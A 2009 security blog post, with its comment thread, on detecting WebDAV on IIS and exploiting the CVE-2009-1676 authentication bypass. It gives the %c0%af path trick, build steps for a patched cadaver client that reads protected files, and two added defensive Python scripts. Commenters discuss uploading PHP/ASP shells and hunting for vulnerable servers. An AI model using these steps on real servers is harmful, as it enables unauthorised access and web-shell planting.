WebDAV Detection, Vulnerability Checking and Exploitation

Ahoy! My name is Andrew and I've been playing with the recent IIS WebDAV authentication bypass vulnerability (CVE-2009-1676) and helping Ron with writing the nmap detection script (http-iis-webdav-vuln.nse) and testing it in the lab. Ron is in a meeting today so I thought I'd jump in where he left off and post a bit about how to detect if WebDAV is enabled and how to actually exploit a folder once you've determined it is vulnerable.

The first thing one should know when playing with this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is _not_ protected then it's time to break out the funky cold medina and have some fun.

Detecting if WebDAV is enabled

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
* IIS 5.0/Windows 2000 SP4

On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.

My method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script:

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</propfind>

When WebDAV is enabled, it should return "HTTP/1.1 207 Multi-Status".

When WebDAV has been disabled, it should return "HTTP/1.1 501 Not Supported".

This is the method I've implemented in the http-iis-webdav-vuln.nse script. It works great in the lab on IIS servers. If we get back anything other than a 207 or 501 then we jump ship saying the web server is not supported. An Ubuntu server running Apache returns a 405 Method Not Allowed for instance.
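As an added example (my own code, not the original post's and not the http-iis-webdav-vuln.nse script), here is the same PROPFIND check in Python. It builds the request shown above, sends it, and maps the status code to the outcomes discussed: 207 means enabled, 501 means disabled, anything else means we jump ship. The extra 401 branch, which reports a password-protected root folder as "protected" (cannot tell) instead of unsupported, and the placeholder host are my additions.

```python
"""PROPFIND-based WebDAV detection (added example; not the original post's or
Nmap's code). Sends the post's PROPFIND body to "/" and classifies the reply."""
import http.client

# Property request body from the post, with the closing </propfind> tag supplied.
PROPFIND_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<propfind xmlns="DAV:">'
    '<getcontentlength xmlns="DAV:"/>'
    '<getlastmodified xmlns="DAV:"/>'
    '<executable xmlns="http://apache.org/dav/props/"/>'
    '<resourcetype xmlns="DAV:"/>'
    '<checked-in xmlns="DAV:"/>'
    '<checked-out xmlns="DAV:"/>'
    '</propfind>'
)


def classify_webdav(status):
    """Map a PROPFIND status code to the outcomes the post describes.

    207 Multi-Status -> WebDAV answered, so it is enabled
    501              -> IIS with WebDAV disabled
    401              -> root folder is password protected; cannot tell (my addition)
    anything else    -> not an answer we understand (Apache gives 405)
    """
    if status == 207:
        return "enabled"
    if status == 501:
        return "disabled"
    if status == 401:
        return "protected"
    return "unsupported"


def build_request(host, path="/"):
    """Raw request bytes equivalent to the one in the post (for a socket or for review)."""
    body = PROPFIND_BODY.encode("utf-8")
    head = (
        f"PROPFIND {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def probe(host, port=80, timeout=5.0):
    """Send the PROPFIND with http.client and return the classification."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("PROPFIND", "/", body=PROPFIND_BODY,
                     headers={"Content-Type": "application/xml"})
        status = conn.getresponse().status
    except (OSError, http.client.HTTPException):
        return "unreachable"
    finally:
        conn.close()
    return classify_webdav(status)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # placeholder host
    print(f"{target}: WebDAV {probe(target)}")
```

Run it as `python propfind_check.py <host>`; the classification logic is separate from the network code so it can be checked against recorded status codes without a live server.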

Checking if a server is vulnerable

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2

Tested not working on
* IIS 5.0/Windows 2000 SP4

The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the %c0%af sequence right after the first /, turning /secret/ into /%c0%afsecret/.

This worked fine on IIS 6.0 but did not work at all on IIS 5.0/5.1. After playing with it some more today, we managed to get it working on IIS 5.1. The trick with 5.1 is that the %c0%af sequence cannot be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0, so I modified the script to use the 5.1/6.0 check, turning /secret/ into /s%c0%afecret/.

Finding a vulnerable server

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2

Tested not working on
* IIS 5.0/Windows 2000 SP4

Now for the fun part. If you haven't turned on some funky cold medina yet, get to it because we're almost done!

First thing we need to do is find a vulnerable server. I just happen to know of a Windows 2003 box in my lab running IIS 6.0 that is vulnerable (fully patched up to today btw). Let's see how an nmap scan of this box with the updated script works out:

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds

Interesting! So now we know the server has WebDAV enabled and that there are three vulnerable folders.

Exploiting it!

Now we could do everything by telnet-ing over port 80, but that's not much fun (believe me, it's very tedious!) so I went looking for a WebDAV client. I stumbled upon a FOSS one called cadaver, and based purely on the name I grabbed it. Now cadaver itself is a great little command line WebDAV client but I quickly realized it has a bunch of problems that won't let us do what we wanted. The nice thing about FOSS is that it's open, so we grabbed the cadaver-0.23.2 source and after hacking away at it for a while, we came up with a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details but basically it does the following:

1) Replace any "Depth: 0" header with "Depth: 1" (otherwise ls won't work)
2) Append the header "Translate: f" to every request (otherwise get and probably others won't work)
3) Insert the characters "%c0%af" into any URI request longer than 1 character.
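Turning the check around to the defender's side, here is an added example (my own code, not the post's, Nmap's, or the cadaver patch) that scans IIS W3C log lines for the %c0%af sequence that both the script's vulnerability check and item 3 of the patch rely on, and works out which folder each such request collapses onto. The log lines are constructed, the protected-folder list is the one from the scan output above, and the assumption that the URI stem is logged percent-encoded as it arrived is mine.

```python
"""Detecting CVE-2009-1676-style requests in IIS logs (added example; not code
from the post, Nmap or cadaver). Looks for overlong UTF-8 sequences such as
%c0%af in the URI stem and works out which folder the request collapses onto."""
from urllib.parse import unquote_to_bytes

# Constructed sample log (not real traffic), W3C extended format. Assumes the
# stem is logged percent-encoded as it arrived; hosts are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-05-20 14:29:01 192.0.2.10 PROPFIND /s%c0%afecret/ - 80 - 198.51.100.7 cadaver/0.23.2 207 0 0
2009-05-20 14:29:02 192.0.2.10 GET /%c0%afprivate/password.txt - 80 - 198.51.100.7 cadaver/0.23.2 200 0 0
2009-05-20 14:30:11 192.0.2.10 GET /index.html - 80 - 198.51.100.8 Mozilla/4.0 200 0 0
2009-05-20 14:30:12 192.0.2.10 GET /caf%C3%A9/menu.txt - 80 - 198.51.100.9 Mozilla/4.0 404 0 0
2009-05-20 14:31:00 192.0.2.10 GET /secret/password.txt - 80 - 198.51.100.9 Mozilla/4.0 401 2 5
"""

# Folders the post's scan reported; in practice take these from the site config.
PROTECTED_FOLDERS = {"/secret/", "/private/", "/webdav/"}


def find_overlong(raw):
    """Return (offset, sequence, char) for each 2-byte overlong UTF-8 sequence.

    A lead byte of 0xC0 or 0xC1 can only encode code points below 0x80, which a
    valid encoder writes as a single byte, so these sequences are never
    legitimate. %c0%af decodes to 0x2F, i.e. an overlong '/'.
    """
    hits = []
    for i in range(len(raw) - 1):
        lead, cont = raw[i], raw[i + 1]
        if lead in (0xC0, 0xC1) and 0x80 <= cont <= 0xBF:
            cp = ((lead & 0x1F) << 6) | (cont & 0x3F)
            hits.append((i, raw[i:i + 2], chr(cp)))
    return hits


def effective_path(raw, hits):
    """Stem with the overlong bytes removed: the folder the request lands on
    once the bytes are discarded, as the post describes for /%c0%afsecret/."""
    out = bytearray(raw)
    for off, seq, _ in sorted(hits, reverse=True):
        del out[off:off + len(seq)]
    return out.decode("utf-8", "replace")


def scan_log(text, protected=PROTECTED_FOLDERS):
    """Return one finding per request whose URI stem carries an overlong sequence."""
    findings, fields = [], None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the records that follow
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        raw = unquote_to_bytes(rec["cs-uri-stem"])
        hits = find_overlong(raw)
        if not hits:
            continue
        target = effective_path(raw, hits)
        top = "/" + target.lstrip("/").split("/", 1)[0] + "/"
        findings.append({
            "client": rec["c-ip"],
            "method": rec["cs-method"],
            "stem": rec["cs-uri-stem"],
            "overlong": [seq.hex() for _, seq, _ in hits],
            "effective_path": target,
            "protected_folder": top in protected,
            "status": int(rec["sc-status"]),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "PROTECTED" if f["protected_folder"] else "unprotected"
        print(f'{f["client"]} {f["method"]} {f["stem"]} -> {f["effective_path"]} '
              f'[{",".join(f["overlong"])}] {flag} status={f["status"]}')
```

The interesting signal is a 2xx on a request whose effective path sits under a protected folder: the same request without the overlong bytes should have produced a 401, as the last constructed line shows.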

So, grab the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here are the commands:

> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
> tar xzvf cadaver-0.23.2.tar.gz
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
> make

Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:

> ./cadaver xxx.xxx.xxx.xxx

This should drop you to a "dav:/>" prompt. Now just cd into the vulnerable folder and check out what's there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':

And there you have it!

Here's a list of commands that I've tested that work with the patched cadaver on a vulnerable folder:
* CD
* LS

Oddly enough, the COPY command does NOT work. We didn't have time to investigate why, but the functionality can be duplicated by a get/local rename/put.

Also, this patched cadaver will not work for browsing regular WebDAV folders (non-vulnerable), so don't try.

If anyone has been able to successfully exploit this on IIS 5.0 (Windows 2000), please contact me, we've been trying and can't get it to work in the lab here.

Comments are welcome, you can also contact me by e-mail: andrew at andreworr dot ca

49 thoughts on “WebDAV Detection, Vulnerability Checking and Exploitation”

  1. Reply


    Isn't it also possible to check if a server has WebDAV enabled by sending this?

    OPTIONS * HTTP/1.0

    1. Reply


      Hi Goku,

      OPTIONS can detect if it's enabled, but OPTIONS can be disabled (and it's best practice to do so -- I expect that most corporate environments disable it). Our method doesn't rely on OPTIONS, but seems to be totally reliable.

      We're planning on using OPTIONS as a backup plan if the '/' folder is password protected, though. At least then we'll have something.

  2. Reply


    I can't scan with nmap. I'm using Backtrack; Backtrack doesn't have nsedebug. How do I install it?

  3. Reply

    Andrew Post author

    Goku: That method does not seem to work reliably. It seems there is a way to disable support for an HTTP OPTIONS request on IIS 6.0. See http://seclists.org/nmap-dev/2009/q2/0417.html for more info. That being said, it would be a great idea to add it as a fallback for when the PROPFIND method doesn't work.

  4. Reply



    Check out the last post regarding nmap for detailed instructions. You can perform an svn update with BT3/4. You can also just reinstall over top, but that's not as helpful and can cause a few problems.

    quick solution:
    $ mkdir nmapbeta/
    $ svn co --username guest --password \\ svn://svn.insecure.org/nmap/ nmapbeta/

    $ cd nmapbeta; ./configure; make
    $ ./nmap --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx


  5. Reply


    Hello Matt, my Y!M (Yahoo Messenger) is: lotches
    MSN: lotches@live.com
    Can you talk about this bug?

  6. Reply


    Sometimes I get this error: |_ http-iis-webdav-vuln: ERROR: Couldn't find folders.lst (should be in nselib/data)

  7. Reply


    I tried it on IIS 6.0 on our lab.
    It was configured like that:
    we created a vhost based on a folder browsable by everyone, which contains some txt files accessible only by administrator.

    I can browse the folder and its content with a common browser, but when I try to list its content using your patched cadaver, it returns no files, like the folder is empty.

    Moreover, trying to bypass the auth mechanism using the unicode attack doesn't work either :(

    I followed exactly your tutorial I suppose. Any clues?


  8. Reply



    Just hit the last post before this. That should give you the detailed information to solve these issues.

  9. Reply



    It is because you don't have folders.lst in the location you mentioned (nselib/data).

    I guess you have to create a new one containing the names of folders you want to bruteforce

  10. Reply

    Andrew Post author


    I'm getting the same results in our lab. I can also browse the contents with a common browser and see there is a file there, but using cadaver (patched and not patched) it does not show the file. Getting the file works (with the patched cadaver), but I'll take a look in a little bit and see what the browser is doing differently than cadaver and try to replicate that in the cadaver patch.

    Thanks for the info!

  11. Reply


    @rangepeacock: Can you share some server with me? I have been searching for one but I can't find it :((

  12. Reply


    @Matt: I saw, but I want to talk with you. Nice to chat with you.

    1. Reply


      Hi Lotches,

      The instructions are all available in this thread, especially in Matt's post -- I don't think we can do much more to help you.


  13. Reply


    sorry, we are using vmware in LAN.


    Besides the cadaver issue, I cannot get the attack working, regardless of the position of the unicode inside the string!
    Looks like one does not simply unicode his way into Mordor!

  14. Reply


    I've successfully been able to upload a PHP file to a WebDAV server with authentication.
    When I then try to do a GET request to execute the PHP shell I get the source code instead.

    So actually it ain't possible to execute system commands.

    Correct me if I'm wrong.


  15. Reply


    I can upload a file to the server but I cannot upload an asp or aspx file; maybe your server???

  16. Reply


    You have to upload it as a txt file. Then afterwards rename it to .asp

  17. Reply


    No, I can't. I think the server doesn't accept uploading or renaming to an asp file.

    dav:/> move 1.txt 1.asp
    Moving `/1.txt' to `/1.asp': failed:
    http://xxxxx.net/1.asp: 403 Forbidden


  18. Reply


    Some do some don't.

  19. Reply


    I got this error; can someone give me the answer? :(

    wishnu@stupid:~/nmapbeta$ ./nmap --script=http-iis-webdav-vuln
    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-25 00:24 WIT
    NSE: failed to initialize the script engine:
    ./nse_main.lua:199: ./http-iis-webdav-vuln.nse:1: '=' expected near '/'
    stack traceback:
    [C]: in function 'assert'
    ./nse_main.lua:199: in function 'new'
    ./nse_main.lua:348: in function 'Entry'
    ./scripts/script.db:16: in function 'db_closure'
    ./nse_main.lua:361: in function 'get_chosen_scripts'
    ./nse_main.lua:504: in main chunk
    [C]: ?


    1. Reply


      Hi wishnu,

      I don't know exactly what your problem is, but try running this command first:
      export NMAPDIR=.

      That'll tell Nmap to use the current directory for its datafiles, not the system directory. It's important to run that before you run Nmap from a non-system folder.

      Hope that helps! If not, I suggest posting to the nmap-dev mailing list.

  20. Reply


    What about over SSL? How can I enable SSL?

    1. Reply


      Hi zoot,

      Unfortunately, I don't think the tool we modified supports SSL at all...


  21. Reply


    Thanks man, works great. Just today I was at the faculty of Informatics and Electrotechnics at my university, met an old friend there with a Microsoft Server in his office and he challenged me to break into it. In less than 10 seconds the work was done and I won a beer :) Cheers

    1. Reply


      @MI1: I think that means you owe us half a beer! ;)

  22. Reply


    anderson@ubuntu:~/cadever-h4x/cadaver-0.23.2$ ./cadaver
    dav:/> cd secret
    Could not access /secret/ (not WebDAV-enabled?):
    Did not find a collection resource.
    dav:/> ls -al
    Listing collection `/-al/': collection is empty.
    Finished successfully?
    I can't command the server.

  23. Reply


    Did not find resource.
    Please help me.
    > patch -p1 < ../cadaver-0.23.2-h4x.patch
    patching file lib/neon/ne_basic.c
    patching file lib/neon/ne_request.c
    patching file lib/neon/ne_uri.c


    1. Reply


      @anderson: it looks like you're doing it right, but either WebDAV isn't enabled or the folder denies permission to list contents, even with WebDAV.

      The only thing I notice is, don't do "ls -al", Cadaver doesn't understand that, just do "ls".

  24. Reply


    I found cadaver-ssl-0.22.2-1012.
    I'm wondering if it's possible to patch this one? I'm working on it, trying to patch it, but I'm not sure about the version...

    1. Reply


      @zo0t: It *might* work, I don't really see why it wouldn't.. let me know how it goes :)

  25. Reply


    I succeeded in installing it, thanks for your help my friends... Oh, I forgot, my name is Wishnu from Indonesia :D..... Nice to meet you all.

  26. Reply


    I can't get the put method to work..

    dav:/webdav/> get readme.txt
    Downloading `/webdav/readme.txt' to readme.txt:
    Progress: [=============================>] 100.0% of 27 bytes succeeded.

    dav:/webdav/> put readme.txt
    Uploading readme.txt to `/webdav/readme.txt':
    Progress: [=============================>] 100.0% of 27 bytes failed:
    403 Forbidden

    dav:/webdav/> cat readme.txt
    Displaying `/webdav/readme.txt':
    U r not supposed to read me

    Is there a special configuration the virtual directory needs to have?

    Thanks in advance.

  27. Reply


    Further investigations allowed me to write to the webdav folder only if write permission was enabled.
    Is it correct or put method works with read only permission too?

  28. Reply


    On two or three test cases (all sites I tried) the vulnerability did not work. The scanner found the folders as vulnerable.

    cadaver and issuing the request manually gave either a 404, or an IIS permissions error. The anonymous user for the site had rights to the private folders. This was IIS 6.0 and 5.0 with WebDAV enabled.

    Sounds like this vulnerability even works on fewer configurations or something.

  29. Reply


    This vulnerability is valid to SMTP IIS.

  30. Reply



    I've just written a translation about this excellent article. I hope there's no problem (I posted a link to the article). Here's the translation:


    See you!

    1. Reply


      @Cortex: Very cool!

      Although I didn't technically write the blog (Andrew did), I don't have any issue with a translation. :)

  31. Reply

    Andrew Post author

    @cortex: Awesome, the only Spanish I know is 'cerveza por favor', nice work!

  32. Reply


    Hey, I need help with nmap. When I want to scan for vulnerable WebDAV:

    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-08 09:55 Central Europe Daylight Time
    NSE: failed to initialize the script engine:
    C:\WINDOWS\system32\nse_main.lua:370: 'http-iis-webdav-vuln' did not match a category, filename, or directory
    stack traceback:
    [C]: in function 'error'
    C:\WINDOWS\system32\nse_main.lua:370: in function 'get_chosen_scripts'
    C:\WINDOWS\system32\nse_main.lua:503: in main chunk
    [C]: ?


    Please help

  33. Reply


    I have the same trouble! ↑
    Sorry, my bad English!

  34. Reply


    Hey, when I try to "make" the cadaver application I get an error, well, a list of errors rather talking about how libintl.h is missing and it can't use the "gettext" command or something.

    Any help?

  35. Reply



    I'm having trouble using cadaver; is it easy to use Metasploit to do the exploit? Can you share some methods for doing it?

  36. Reply


    dav:/> cat default.asp
    Displaying `/default.asp':
    Failed: 403 Forbidden

    How do I display it? I got the same problem with another file on another IIS. Thanks

  37. Reply


    Hi! I couldn't get or cat any ASP file, but I can view CSS files. How do I get or cat an ASP file? Thanks

  38. Reply


    thank you man :)

  39. Reply


    If Apache returns a 405 does this mean WebDAV is or isn't enabled?

  40. Reply


    If Apache returns a 405 does this mean WebDAV is or isn't enabled? Is there a version of this script ported for testing Apache?

  41. Reply


    How can we confirm WebDAV on an Apache server?
